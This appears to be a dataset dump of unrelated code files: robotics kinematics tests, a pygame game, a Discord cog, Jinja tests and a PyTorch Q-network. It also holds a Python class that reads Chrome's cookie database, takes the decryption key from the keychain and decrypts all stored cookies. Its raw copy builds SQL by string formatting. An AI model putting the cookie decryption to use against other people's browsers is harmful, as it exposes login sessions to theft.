import numpy as np
from handModel import HandModel
from scipy.spatial.transform import Rotation as R
def test_hand_model_FK():
    """Smoke-test forward kinematics and the Jacobian of the Allegro hand."""
    model = HandModel("allegro/robot_description")
    q = np.array([0.1, 0.1, 0.1, 0.1]).T
    # 2 denotes RING finger
    fk = model.FK(q, 2) # 4x4 matrix
    assert fk.shape == (4,4)
    position = np.squeeze(fk[0:3,3]).T
    # Regression values for the fingertip position at this configuration.
    assert abs(position[0,0] - 0.03917029) < 1e-4
    assert abs(position[1,0] - (-0.05071672)) < 1e-4
    assert abs(position[2,0] - 0.14898276) < 1e-4
    print("FK is correct")
    # fk for biotac origin must be different
    fk_origin = model.FK(q, 2,"ring_biotac_origin")
    position_origin = np.squeeze(fk_origin[0:3,3]).T
    assert abs(position_origin[0,0] - position[0,0]) > 1e-4
    assert abs(position_origin[1,0] - position[1,0]) > 1e-4
    assert abs(position_origin[2,0] - position[2,0]) > 1e-4
    print("chains to origins are constructed as well")
    # test jacobians
    # Finite-difference check: J @ delta_q should approximate delta_x.
    q_1 = q
    q_2 = np.array([1e-2 + q_1[i] for i in range(4)]).T
    delta_q = q_2 - q_1
    fk_2 = model.FK(q_2, 2)
    fk_1 = model.FK(q_1,2) # 4x4 matrix
    position = np.squeeze(fk_2[0:3,3]).T - np.squeeze(fk_1[0:3,3]).T
    # NOTE(review): Rotation.from_dcm was renamed to from_matrix in SciPy 1.4
    # and removed in 1.6 -- this needs an old SciPy; confirm pinned version.
    rotation = R.from_dcm(fk_2[:3,:3]).as_euler("xyz").T - R.from_dcm(fk_1[:3,:3]).as_euler("xyz").T
    rotation = np.expand_dims(rotation,1)
    delta_x = np.vstack((position,rotation))
    j = model.Jacobian(q_2, 2)
    print("j dot delta_q: ", np.dot(j, delta_q))
    print("delta_x: ", delta_x)
def main():
    """Entry point: run the FK/Jacobian smoke test."""
    test_hand_model_FK()
if __name__ == "__main__":
    main()
|
import numpy as np
from handModel import HandModel
from scipy.spatial.transform import Rotation as R
def test_hand_model_FK():
model = HandModel("allegro/robot_description")
q = np.array([0.1, 0.1, 0.1, 0.1]).T
# 2 denotes RING finger
fk = model.FK(q, 2) # 4x4 matrix
assert fk.shape == (4,4)
position = np.squeeze(fk[0:3,3]).T
assert abs(position[0,0] - 0.03917029) < 1e-4
assert abs(position[1,0] - (-0.05071672)) < 1e-4
assert abs(position[2,0] - 0.14898276) < 1e-4
print("FK is correct")
# fk for biotac origin must be different
fk_origin = model.FK(q, 2,"ring_biotac_origin")
position_origin = np.squeeze(fk_origin[0:3,3]).T
assert abs(position_origin[0,0] - position[0,0]) > 1e-4
assert abs(position_origin[1,0] - position[1,0]) > 1e-4
assert abs(position_origin[2,0] - position[2,0]) > 1e-4
print("chains to origins are constructed as well")
# test jacobians
q_1 = q
q_2 = np.array([1e-2 + q_1[i] for i in range(4)]).T
delta_q = q_2 - q_1
fk_2 = model.FK(q_2, 2)
fk_1 = model.FK(q_1,2) # 4x4 matrix
position = np.squeeze(fk_2[0:3,3]).T - np.squeeze(fk_1[0:3,3]).T
rotation = R.from_dcm(fk_2[:3,:3]).as_euler("xyz").T - R.from_dcm(fk_1[:3,:3]).as_euler("xyz").T
rotation = np.expand_dims(rotation,1)
delta_x = np.vstack((position,rotation))
j = model.Jacobian(q_2, 2)
print("j dot delta_q: ", np.dot(j, delta_q))
print("delta_x: ", delta_x)
def main():
test_hand_model_FK()
if __name__ == "__main__":
main()
|
en
| 0.716927
|
# 2 denotes RING finger # 4x4 matrix # fk for biotac origin must be different # test jacobians # 4x4 matrix
| 2.342401
| 2
|
src/pyfuncs/chrome_cookie.py
|
fishs-x/pyfuncs
| 0
|
6628070
|
import getpass
import logging
import os
import sqlite3
import sys
from itertools import chain
from typing import Iterator
from urllib.parse import urlparse

import keyring
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def dict_factory(cursor, row):
    """sqlite3 row factory: map column names from the cursor description
    onto the row values, returning the row as a dict."""
    return {column[0]: row[index] for index, column in enumerate(cursor.description)}
class ChromeCookie:
    """Read and decrypt cookies from a Chrome/Chromium SQLite cookie store.

    Column notes for the ``cookies`` table (translated from the original
    Chinese comments):

    creation_utc: UTC time the cookie was created
    host_key: domain (site) the cookie belongs to
    name: cookie name
    value: plain-text cookie value; Chrome encrypts almost all values
        before storing them, so this column is usually empty
    path: path from the server's Set-Cookie response (starts with '/')
    expires_utc: expiry time of the cookie
    is_secure: cookie may only travel over an encrypted channel (https)
    is_httponly: when 1, in-page JavaScript cannot read the cookie; only
        HTTP requests can, protecting it from script theft
    last_access_utc: last time the cookie was accessed
    has_expires: whether the expiry is valid
    is_persistent: 1 when expires_utc is non-zero
    priority: deletion priority used when the store hits its size limit
    encrypted_value: the encrypted cookie value
    firstpartyonly: first-party / third-party HTTP request classification
    """
    def __init__(self):
        # All fields are populated by init_by_system().
        self.iterations = None   # PBKDF2 iteration count (platform specific)
        self.my_pass = None      # key material used to derive the AES key
        self.cookie_path = None  # path to the SQLite cookie database
        self.connect = None      # sqlite3 connection (rows as dicts)
        self.logger = None
        self.decryptor = None    # kept for backward compatibility; unused
    def _init_sqlite3_connect(self) -> None:
        """Open the SQLite connection to the cookie database."""
        if not self.cookie_path:
            raise Exception("not find cookie_path")
        connect = sqlite3.connect(self.cookie_path)
        connect.row_factory = dict_factory
        self.connect = connect
    def init_by_system(self) -> None:
        """Initialise platform-specific parameters and open the database."""
        self.logger = logging.getLogger(__name__)
        if sys.platform == 'darwin':
            self._init_for_mac()
        elif sys.platform == 'linux':
            self._init_for_linux()
        else:
            raise Exception("不支持{}系统".format(sys.platform))
        self._init_decryptor()
        self._init_sqlite3_connect()
    def _init_for_linux(self) -> None:
        """Linux parameters (Chromium's fixed-password scheme)."""
        self.iterations = 1
        # Bug fix: sqlite3.connect does not expand '~' itself.
        self.cookie_path = os.path.expanduser("~/.config/chromium/Default/Cookies")
        self.my_pass = '<PASSWORD>'.encode('utf8')
    def _init_for_mac(self) -> None:
        """macOS parameters; the key comes from the login keychain."""
        self.iterations = 1003
        user = getpass.getuser()
        self.cookie_path = "/Users/{}/Library/Application Support/Google/Chrome/Default/Cookies".format(
            user)
        self.my_pass = keyring.get_password(
            'Chrome Safe Storage', 'Chrome').encode("utf8")
    def _init_decryptor(self) -> None:
        """Derive the AES key and build the Cipher used for decryption."""
        enc_key = PBKDF2HMAC(
            algorithm=SHA1(),
            backend=default_backend(),
            iterations=self.iterations,
            length=16,
            salt=b"saltysalt",
        ).derive(self.my_pass)
        # Chrome uses AES-128-CBC with an IV of sixteen spaces.
        self.cipher = Cipher(algorithm=AES(enc_key), mode=CBC(
            b" " * 16), backend=default_backend())
    @staticmethod
    def clean(decrypted: bytes) -> str:
        """Strip PKCS#7-style padding and decode the plaintext to str."""
        last = decrypted[-1]
        if isinstance(last, int):
            # Python 3: indexing bytes yields an int (the pad length).
            return decrypted[:-last].decode("utf8")
        # Python 2 fallback: indexing yields a one-char str.
        return decrypted[: -ord(last)].decode("utf8")
    def encrypted_value_decrypt(self, encrypted_value: bytes) -> str:
        """Decrypt a Chrome ``encrypted_value`` blob.

        The first three bytes are the version prefix (e.g. b'v10') and are
        not part of the ciphertext.
        """
        encrypted_value = encrypted_value[3:]
        decryptor = self.cipher.decryptor()
        return self.clean(decryptor.update(encrypted_value) + decryptor.finalize())
    def execute(self, sql: str, params: tuple = ()) -> Iterator:
        """Run *sql* and yield rows with the decrypted value in 'value'.

        ``params`` (new, optional, defaults to no parameters) are bound by
        sqlite3 so callers can pass user input without string formatting.
        """
        self.logger.info("execute sql: {}".format(sql))
        cursor = self.connect.cursor()
        for row in cursor.execute(sql, params):
            value = self.encrypted_value_decrypt(
                row.get('encrypted_value'))
            row['value'] = value
            yield row
        cursor.close()
    @classmethod
    def _get_host_name(cls, host: str) -> Iterator[str]:
        """Yield candidate host_key values for *host*, e.g.:

        example.com
        .example.com
        foo.example.com
        .foo.example.com
        """
        hostname = urlparse(host).hostname
        if not hostname:
            # *host* was a bare domain rather than a full URL.
            yield host
            yield "." + host
            return
        hostname_list = hostname.split('.')
        for i in range(2, len(hostname_list) + 1):
            domain = ".".join(hostname_list[-i:])
            yield domain
            yield "." + domain
    def get_cookie_by_host(self, host: str) -> dict:
        """Return a name -> value dict of cookies matching *host*."""
        result = []
        cookies = {}
        for host_name in self._get_host_name(host):
            # Security fix: parameterised LIKE pattern instead of building
            # the pattern into the SQL string (injection via *host*).
            sql = 'select * from cookies where host_key like ?;'
            result.append(self.execute(sql, ('%' + host_name + '%',)))
        for item in chain(*result):
            # setdefault: the first match for a name wins.
            cookies.setdefault(item['name'], item['value'])
        return cookies
    def get_cookie_by_sql(self, sql) -> dict:
        """Return a name -> value dict for an arbitrary SELECT on cookies."""
        cookies = {}
        for item in self.execute(sql=sql):
            cookies.setdefault(item['name'], item['value'])
        return cookies
    def __enter__(self):
        self.init_by_system()
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.connect.close()
|
import sys
import sqlite3
import getpass
import logging
import keyring
from itertools import chain
from typing import Iterator
from urllib.parse import urlparse
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
class ChromeCookie:
"""
creation_utc:Cookie产生的utc时间
host_key:Cookie所在的网页(domain)
name:Cookie名称
value:不加密的Cookie值,由于Chrome几乎都会对Cookie值加密后再存储,因此这个字段基本都是空的
path:如果服务器需要设置Cookies,那么服务器在响应浏览器请求的时候会返回Set-Cookie的响应,并且附带所要设置的Cookies,这里的path的默认值就是返回Set-Cookie的那个页面。path以'/'为开头。
expires_utc:Cookie的有效期限
is_secure:指示在浏览器与服务器之间传输该Cookie时需要采用加密通道,即https
is_httponly:当设置了该值为1时,在浏览器上运行的JS不能读取到该Cookie,该Cookie只能由http请求读取。这个标记主要目的是提高Cookie的安全性,防止无关的JS脚本窃取Cookie中的重要信息
last_access_utc:上一次访问到该Cookie的时间
has_expires:Cookie的期限是否有效
is_persistent:如果expires_utc不为0,那么这个值为1
priority:Cookie的删除优先级,Cookie也有存储上限的,当超出上限则需要删除,此时会有特定的删除策略来删除不同priority的Cookie
encrypted_value:加密后的Cookie值
firstpartyonly:first-party以及third-party是HTTP Request的一种分类,\
"""
def __init__(self):
self.iterations = None
self.my_pass = None
self.cookie_path = None
self.connect = None
self.logger = None
self.decryptor = None
def _init_sqlite3_connect(self) -> None:
"""获取sqlite连接"""
if not self.cookie_path:
raise Exception("not find cookie_path")
connect = sqlite3.connect(self.cookie_path)
connect.row_factory = dict_factory
self.connect = connect
def init_by_system(self) -> None:
"""根据系统初始化参数"""
self.logger = logging.getLogger(__name__)
if sys.platform == 'darwin':
self._init_for_mac()
elif sys.platform == 'linux':
self._init_for_linux()
else:
raise Exception("不支持{}系统".format(sys.platform))
self._init_decryptor()
self._init_sqlite3_connect()
def _init_for_linux(self) -> None:
"""Linux初始化参数、"""
self.iterations = 1
self.cookie_path = "~/.config/chromium/Default/Cookies"
self.my_pass = '<PASSWORD>'.encode('utf8')
def _init_for_mac(self) -> None:
"""Mac初始化参数、"""
self.iterations = 1003
user = getpass.getuser()
self.cookie_path = "/Users/{}/Library/Application Support/Google/Chrome/Default/Cookies".format(
user)
self.my_pass = keyring.get_password(
'Chrome Safe Storage', 'Chrome').encode("utf8")
def _init_decryptor(self) -> None:
"""初始化Cipher 解密时使用"""
enc_key = PBKDF2HMAC(
algorithm=SHA1(),
backend=default_backend(),
iterations=self.iterations,
length=16,
salt=b"saltysalt",
).derive(self.my_pass)
self.cipher = Cipher(algorithm=AES(enc_key), mode=CBC(
b" " * 16), backend=default_backend())
@staticmethod
def clean(decrypted: bytes) -> str:
"""清除格式"""
last = decrypted[-1]
if isinstance(last, int):
return decrypted[:-last].decode("utf8")
return decrypted[: -ord(last)].decode("utf8")
def encrypted_value_decrypt(self, encrypted_value: bytes) -> str:
"""chome cookie encrypted_value解密"""
encrypted_value = encrypted_value[3:]
decryptor = self.cipher.decryptor()
return self.clean(decryptor.update(encrypted_value) + decryptor.finalize())
def execute(self, sql: str) -> Iterator:
"""执行sql"""
self.logger.info("execute sql: {}".format(sql))
cursor = self.connect.cursor()
for row in cursor.execute(sql):
value = self.encrypted_value_decrypt(
row.get('encrypted_value'))
row['value'] = value
yield row
cursor.close()
@classmethod
def _get_host_name(cls, host: str) -> str:
"""获取域名
example.com
.example.com
foo.example.com
.foo.example.com
"""
hostname = urlparse(host).hostname
if not hostname:
yield host
yield "." + host
return
hostname_list = hostname.split('.')
for i in range(2, len(hostname_list) + 1):
domain = ".".join(hostname_list[-i:])
yield domain
yield "." + domain
def get_cookie_by_host(self, host: str) -> Iterator[str]:
"""获取cookie
"""
result = []
cookies = {}
for host_name in self._get_host_name(host):
sql = 'select * from cookies where host_key like "%{host_name}%";'.format(host_name=host_name)
result.append(self.execute(sql))
for item in chain(*result):
cookies.setdefault(item['name'], item['value'])
return cookies
def get_cookie_by_sql(self, sql):
cookies = {}
for item in self.execute(sql=sql):
cookies.setdefault(item['name'], item['value'])
return cookies
def __enter__(self):
self.init_by_system()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.connect.close()
|
zh
| 0.872779
|
creation_utc:Cookie产生的utc时间 host_key:Cookie所在的网页(domain) name:Cookie名称 value:不加密的Cookie值,由于Chrome几乎都会对Cookie值加密后再存储,因此这个字段基本都是空的 path:如果服务器需要设置Cookies,那么服务器在响应浏览器请求的时候会返回Set-Cookie的响应,并且附带所要设置的Cookies,这里的path的默认值就是返回Set-Cookie的那个页面。path以'/'为开头。 expires_utc:Cookie的有效期限 is_secure:指示在浏览器与服务器之间传输该Cookie时需要采用加密通道,即https is_httponly:当设置了该值为1时,在浏览器上运行的JS不能读取到该Cookie,该Cookie只能由http请求读取。这个标记主要目的是提高Cookie的安全性,防止无关的JS脚本窃取Cookie中的重要信息 last_access_utc:上一次访问到该Cookie的时间 has_expires:Cookie的期限是否有效 is_persistent:如果expires_utc不为0,那么这个值为1 priority:Cookie的删除优先级,Cookie也有存储上限的,当超出上限则需要删除,此时会有特定的删除策略来删除不同priority的Cookie encrypted_value:加密后的Cookie值 firstpartyonly:first-party以及third-party是HTTP Request的一种分类,\ 获取sqlite连接 根据系统初始化参数 Linux初始化参数、 Mac初始化参数、 初始化Cipher 解密时使用 清除格式 chome cookie encrypted_value解密 执行sql 获取域名 example.com .example.com foo.example.com .foo.example.com 获取cookie
| 2.061282
| 2
|
flappybird.py
|
karangandhi272/Flappy-ball
| 0
|
6628071
|
<filename>flappybird.py
import pygame
import random
pygame.init()
pygame.font.init()
pygame.display.set_caption("Flappy Ball")
screen = pygame.display.set_mode((400, 600))
scorefont = pygame.font.SysFont('Comic Sans MS', 15)
def main():
    """Game loop: gravity-style ball physics, two pipe pairs, score HUD."""
    global z
    global score
    global y
    global spacecount
    global highscore
    score = 0
    highscore = 0
    restart()
    while True:
        screen.fill((255,255,255))
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                return
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    # Flap: jump up and restart the fall clock from now.
                    y -= 60
                    z = pygame.time.get_ticks()/1000
                    # NOTE(review): `displacement` and `time` are locals here
                    # (not in the globals list); restart()'s globals of the
                    # same names are shadowed -- confirm this is intended.
                    displacement = y
                    spacecount += 1
        if spacecount > 0:
            # Parabolic fall: y = 30*t^2 measured from the last flap.
            time = pygame.time.get_ticks()/1000 + 1 - z
            y = (30 * time * time) + displacement
        if y < 0 or y > 570:
            # Ball left the screen: reset the round and re-park both bars.
            restart()
            bar1.barx = 430
            bar2.barx = 630
        bar1.barmechanics()
        bar1.y = y
        bar1.spaces = spacecount
        bar2.barmechanics()
        bar2.y = y
        bar2.spaces = spacecount
        scoretext = scorefont.render(f'score: {score}', False, (0, 0, 0))
        highscoretext = scorefont.render(f'highscore: {highscore}', False, (0, 0, 0,))
        pygame.draw.circle(screen,(0,0,0),(200,y),10)
        screen.blit(scoretext,(330,0))
        screen.blit(highscoretext,(0,0))
        pygame.display.update()
class bar:
    """One pipe pair: a top rect (0..bar1y) and bottom rect (bar2y..600)
    with a gap the ball must pass through."""
    def __init__(self,barx,y,spacecount):
        self.barx = barx                       # current x position
        self.bar1y = random.randint(100,500)   # bottom edge of top pipe
        self.bar2y = self.bar1y + 100          # top edge of bottom pipe
        self.y = y                             # ball y, synced each frame
        self.start = barx                      # spawn x, restored on crash
        self.spaces = spacecount               # >0 once the game has started
    def barmechanics(self):
        """Move, respawn, score and collision-check this pipe pair."""
        global score
        global loop
        if self.barx < -20:
            # Off-screen left: respawn on the right with a new gap.
            self.barx = 430
            self.bar1y = random.randint(50,550)
            self.bar2y = self.bar1y + 90
            loop += 1
        if self.spaces > 0:
            self.barx -= 0.08
        if self.barx < 190:
            # Passed the ball's x (200): bank the lap count as the score.
            score = loop
        if self.barx < 210 and self.barx > 190:
            # Pipe overlaps the ball's column: collide unless y is in the gap.
            if self.y < self.bar1y or self.y > self.bar2y:
                self.barx = self.start
                restart()
        pygame.draw.rect(screen,(0,0,0),(self.barx,0,30,self.bar1y))
        pygame.draw.rect(screen,(0,0,0),(self.barx,self.bar2y,30,600 - self.bar2y))
def restart():
    """Reset all round state, promote the score to highscore, and rebuild
    both pipe pairs at their spawn positions."""
    global z
    global score
    global y
    global spacecount
    global time
    global displacement
    global bar1
    global bar2
    global highscore
    global loop
    if score > highscore:
        highscore = score
    z = 0
    score = 0
    y = 290            # ball back to mid-screen
    spacecount = 0     # physics is paused until the first flap
    time = 0
    displacement = 0
    loop = 1
    bar1 = bar(430,y,spacecount)
    bar2 = bar(630,y,spacecount)
if __name__ == '__main__':
main()
|
<filename>flappybird.py
import pygame
import random
pygame.init()
pygame.font.init()
pygame.display.set_caption("Flappy Ball")
screen = pygame.display.set_mode((400, 600))
scorefont = pygame.font.SysFont('Comic Sans MS', 15)
def main():
global z
global score
global y
global spacecount
global highscore
score = 0
highscore = 0
restart()
while True:
screen.fill((255,255,255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
y -= 60
z = pygame.time.get_ticks()/1000
displacement = y
spacecount += 1
if spacecount > 0:
time = pygame.time.get_ticks()/1000 + 1 - z
y = (30 * time * time) + displacement
if y < 0 or y > 570:
restart()
bar1.barx = 430
bar2.barx = 630
bar1.barmechanics()
bar1.y = y
bar1.spaces = spacecount
bar2.barmechanics()
bar2.y = y
bar2.spaces = spacecount
scoretext = scorefont.render(f'score: {score}', False, (0, 0, 0))
highscoretext = scorefont.render(f'highscore: {highscore}', False, (0, 0, 0,))
pygame.draw.circle(screen,(0,0,0),(200,y),10)
screen.blit(scoretext,(330,0))
screen.blit(highscoretext,(0,0))
pygame.display.update()
class bar:
def __init__(self,barx,y,spacecount):
self.barx = barx
self.bar1y = random.randint(100,500)
self.bar2y = self.bar1y + 100
self.y = y
self.start = barx
self.spaces = spacecount
def barmechanics(self):
global score
global loop
if self.barx < -20:
self.barx = 430
self.bar1y = random.randint(50,550)
self.bar2y = self.bar1y + 90
loop += 1
if self.spaces > 0:
self.barx -= 0.08
if self.barx < 190:
score = loop
if self.barx < 210 and self.barx > 190:
if self.y < self.bar1y or self.y > self.bar2y:
self.barx = self.start
restart()
pygame.draw.rect(screen,(0,0,0),(self.barx,0,30,self.bar1y))
pygame.draw.rect(screen,(0,0,0),(self.barx,self.bar2y,30,600 - self.bar2y))
def restart():
global z
global score
global y
global spacecount
global time
global displacement
global bar1
global bar2
global highscore
global loop
if score > highscore:
highscore = score
z = 0
score = 0
y = 290
spacecount = 0
time = 0
displacement = 0
loop = 1
bar1 = bar(430,y,spacecount)
bar2 = bar(630,y,spacecount)
if __name__ == '__main__':
main()
|
none
| 1
| 3.250999
| 3
|
|
cogs/welcome_goodbye.py
|
nikhilvayeda/Bhendi-Bot-3
| 8
|
6628072
|
<filename>cogs/welcome_goodbye.py<gh_stars>1-10
import discord
from discord.ext import commands
import Constants as consts
class Others_welcome_goodbye(commands.Cog):
    """Cog that posts welcome/goodbye embeds in the configured channel."""
    def __init__(self, client):
        self.client = client
        # Resolved lazily on first event: get_channel may return None until
        # the bot's cache is ready, so resolution is retried per event.
        self.channel = None
    @commands.Cog.listener()
    async def on_member_join(self, member):
        '''when a member joins the server'''
        # Idiom fix: `is None` instead of `== None`.
        if self.channel is None:
            self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
        _total_member = self.count_total_members()
        _embed = discord.Embed(title="New Member!", color=discord.Colour.blue())
        _embed.add_field(name="Hello", value=f"""Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}>""" )
        _embed.add_field(name="Member Count", value=f"#{_total_member + 1} members")
        _embed.set_image(url="https://cdn.discordapp.com/attachments/722370864229646377/733302632977924146/image0.gif")
        await self.channel.send(member.mention, embed=_embed)
    @commands.Cog.listener()
    async def on_member_remove(self, member):
        '''when a member leaves the server'''
        if self.channel is None:
            self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
        _total_member = self.count_total_members()
        _embed = discord.Embed(title=f"{member} has left the server. Can we get some F please", color=discord.Colour.red())
        _embed.set_image(url="https://cdn.discordapp.com/attachments/729979069248176162/731784988009168906/image0.gif")
        await self.channel.send(embed=_embed)
    def count_total_members(self):
        """Count non-bot members of the guild owning the welcome channel."""
        return len([m for m in self.channel.guild.members if not m.bot])
def setup(client):
    """discord.py extension entry point: register the cog on the bot."""
    client.add_cog(Others_welcome_goodbye(client))
|
<filename>cogs/welcome_goodbye.py<gh_stars>1-10
import discord
from discord.ext import commands
import Constants as consts
class Others_welcome_goodbye(commands.Cog):
def __init__(self, client):
self.client = client
self.channel = None
@commands.Cog.listener()
async def on_member_join(self, member):
'''when a member joins the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title="New Member!", color=discord.Colour.blue())
_embed.add_field(name=f"Hello", value=f"""Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}>""" )
_embed.add_field(name="Member Count", value=f"#{_total_member + 1} members")
_embed.set_image(url="https://cdn.discordapp.com/attachments/722370864229646377/733302632977924146/image0.gif")
await self.channel.send(member.mention, embed=_embed)
@commands.Cog.listener()
async def on_member_remove(self, member):
'''when a member leaves the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title=f"{member} has left the server. Can we get some F please", color=discord.Colour.red())
_embed.set_image(url="https://cdn.discordapp.com/attachments/729979069248176162/731784988009168906/image0.gif")
await self.channel.send(embed=_embed)
def count_total_members(self):
return len([m for m in self.channel.guild.members if not m.bot])
def setup(client):
client.add_cog(Others_welcome_goodbye(client))
|
en
| 0.857596
|
when a member joins the server Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}> when a member leaves the server
| 2.964902
| 3
|
grow/templates/tests.py
|
akashkalal/grow
| 335
|
6628073
|
"""Template jinja tests."""
def is_subset_of(value, subset):
    """Check if a variable is a subset."""
    # True when every element of *subset* appears in *value*.
    return set(value).issuperset(subset)
def is_superset_of(value, superset):
    """Check if a variable is a superset."""
    # True when every element of *value* appears in *superset*.
    return set(value).issubset(superset)
def create_builtin_tests():
    """Tests standard for the template rendering."""
    # Registry of jinja test name -> predicate, exported as name/func pairs.
    builtin_tests = {
        'subset': is_subset_of,
        'superset': is_superset_of,
    }
    return tuple(builtin_tests.items())
|
"""Template jinja tests."""
def is_subset_of(value, subset):
"""Check if a variable is a subset."""
return set(value) >= set(subset)
def is_superset_of(value, superset):
"""Check if a variable is a superset."""
return set(value) <= set(superset)
def create_builtin_tests():
"""Tests standard for the template rendering."""
return (
('subset', is_subset_of),
('superset', is_superset_of),
)
|
en
| 0.591444
|
Template jinja tests. Check if a variable is a subset. Check if a variable is a superset. Tests standard for the template rendering.
| 2.387294
| 2
|
p1_navigation/QNetwork.py
|
asolis345/Udacity_RL
| 0
|
6628074
|
<reponame>asolis345/Udacity_RL
import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
    """Actor (Policy) Model: fully-connected network mapping states to
    per-action values."""
    def __init__(self, state_size, action_size, layers, seed, dropout=0.2, use_l_relu=False):
        """Initialize parameters and build model.
        Params
        ======
            state_size (int): Dimension of each state
            action_size (int): Dimension of each action
            layers (list of int): Hidden-layer widths, in order
            seed (int): Random seed
            dropout (float): Dropout rate (see review note below)
            use_l_relu (bool): Use LeakyReLU instead of ReLU activations
        """
        super(QNetwork, self).__init__()
        self.seed = torch.manual_seed(seed)
        "*** YOUR CODE HERE ***"
        self.drop_rate = dropout
        self.use_l_relu = use_l_relu
        self.state_size = state_size
        self.action_size = action_size
        # Input layer followed by its activation.
        self.tmp_layers = [nn.Linear(state_size, layers[0])]
        self._add_activation_function(use_l_relu, self.tmp_layers)
        # Hidden layers; the final Linear maps to action_size with no
        # activation appended here (sigmoid is applied in forward()).
        for i, _ in enumerate(layers):
            if i < len(layers) -1:
                self.tmp_layers.append(nn.Linear(layers[i], layers[i+1]))
                self._add_activation_function(use_l_relu, self.tmp_layers)
            else:
                self.tmp_layers.append(nn.Linear(layers[i], action_size))
        self.layers = nn.Sequential(*self.tmp_layers)
        # NOTE(review): "droput" is a typo for "dropout", and this module is
        # never applied in forward() -- confirm whether dropout was intended.
        self.droput = nn.Dropout(self.drop_rate)
    def forward(self, state):
        """Build a network that maps state -> action values."""
        # NOTE(review): sigmoid bounds outputs to (0, 1), which is unusual
        # for unbounded Q-value regression -- confirm this is intended.
        x = torch.sigmoid(self.layers(state))
        return x
    def _add_activation_function(self, use_l_relu, layers):
        # Appends the chosen activation to self.tmp_layers. The `layers`
        # parameter is accepted but unused (callers pass self.tmp_layers).
        if use_l_relu:
            self.tmp_layers.append(nn.LeakyReLU())
        else:
            self.tmp_layers.append(nn.ReLU())
    def print_parameters(self, episode):
        # Append every named parameter tensor to model_weights_<episode>.txt.
        with open(str(f'model_weights_{episode}.txt'), 'a') as fp:
            for name, param in self.named_parameters():
                print(f'Name: {name}\tParam: {param}', file=fp)
            print('{}'.format('='*40), file=fp)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
    """Actor (Policy) Model: an MLP mapping states to per-action values.

    The stack is Linear -> activation for each width in ``layers``, a final
    Linear projection down to ``action_size``, and a sigmoid on the output.
    """
    def __init__(self, state_size, action_size, layers, seed, dropout=0.2, use_l_relu=False):
        """Initialize parameters and build model.
        Params
        ======
            state_size (int): Dimension of each state
            action_size (int): Dimension of each action
            layers (sequence[int]): Hidden-layer widths, in order (non-empty)
            seed (int): Random seed
            dropout (float): Dropout rate. NOTE(review): a Dropout module is
                created but never applied in forward() — confirm intent.
            use_l_relu (bool): Use LeakyReLU instead of ReLU between layers
        """
        super(QNetwork, self).__init__()
        self.seed = torch.manual_seed(seed)
        self.drop_rate = dropout
        self.use_l_relu = use_l_relu
        self.state_size = state_size
        self.action_size = action_size
        # Input projection, then one Linear+activation per hidden transition,
        # ending with a Linear down to the action values (no activation there;
        # the sigmoid is applied in forward()).
        self.tmp_layers = [nn.Linear(state_size, layers[0])]
        self._add_activation_function(use_l_relu, self.tmp_layers)
        for in_width, out_width in zip(layers[:-1], layers[1:]):
            self.tmp_layers.append(nn.Linear(in_width, out_width))
            self._add_activation_function(use_l_relu, self.tmp_layers)
        self.tmp_layers.append(nn.Linear(layers[-1], action_size))
        self.layers = nn.Sequential(*self.tmp_layers)
        # sic: attribute name "droput" kept for backward compatibility.
        self.droput = nn.Dropout(self.drop_rate)
    def forward(self, state):
        """Build a network that maps state -> action values (sigmoid-squashed)."""
        return torch.sigmoid(self.layers(state))
    def _add_activation_function(self, use_l_relu, layers):
        """Append the configured activation module to ``layers``.

        Bug fix: the original ignored the ``layers`` parameter and hard-coded
        ``self.tmp_layers`` (identical in practice, since callers always pass
        that list, but the parameter is now honored).
        """
        layers.append(nn.LeakyReLU() if use_l_relu else nn.ReLU())
    def print_parameters(self, episode):
        """Append every named parameter to ``model_weights_<episode>.txt``."""
        with open(f'model_weights_{episode}.txt', 'a') as fp:
            for name, param in self.named_parameters():
                print(f'Name: {name}\tParam: {param}', file=fp)
                print('=' * 40, file=fp)
|
en
| 0.582958
|
Actor (Policy) Model. Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed Build a network that maps state -> action values.
| 2.910425
| 3
|
src/python/pants/engine/internals/engine_test.py
|
wiwa/pants
| 0
|
6628075
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import time
import unittest
from dataclasses import dataclass, field
